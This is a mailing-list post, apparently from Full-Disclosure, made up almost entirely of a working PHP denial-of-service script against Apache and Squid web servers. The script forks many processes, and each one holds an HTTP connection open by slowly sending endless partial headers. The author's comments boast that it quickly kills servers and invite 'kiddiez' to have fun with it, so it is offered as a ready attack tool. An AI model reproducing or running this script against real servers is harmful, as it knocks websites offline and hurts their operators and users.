Exploit for new apache and squid dos mentioned on sans..
<?php
/*
DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601
I wrote it in PHP because I find it funny to make PHP attack apache...
I set it at 200 processes and it kill my test servers pretty quick. have
fun kiddiez...
greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT,
bastard labs, neonfreon and everyone else you know who you are.....
--evilrabbi b4b0
*/
/**
* Usage function...
*
* @param $argv array
* @return void
*/
function usage($argv)
{
print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or
hostname>\n";
die();
}
/**
* Hangs the connection to the webserver
*
* @param $server string
* @return void
*/
function killTheFucker($server)
{
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: {$server}\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Content-Length: " . rand(1, 1000) . "\r\n";
$request .= "X-a: " . rand(1, 10000) . "\r\n";
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
{
sleep(15);
}
}
/**
* main function
* @param $argc int
* @param $argv array
* @return void
*/
function main($argc, $argv)
{
$status = 1;
if ($argc < 3)
{
usage($argv);
}
$pids = Array();
for ($i = 0; $i < $argv[1]; $i++)
{
$pid = pcntl_fork();
if ($pid == -1)
{
die("err...@# YOU MADE BABY JESUS CRY");
}
else if ($pid == 0)
{
killTheFucker($argv[2]);
exit(0);
}
else
{
$pids[] = $pid;
}
}
foreach ($pids as $pid)
{
pcntl_waitpid($pid, $status);
}
}
// fire everything up
main($argc, $argv);
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
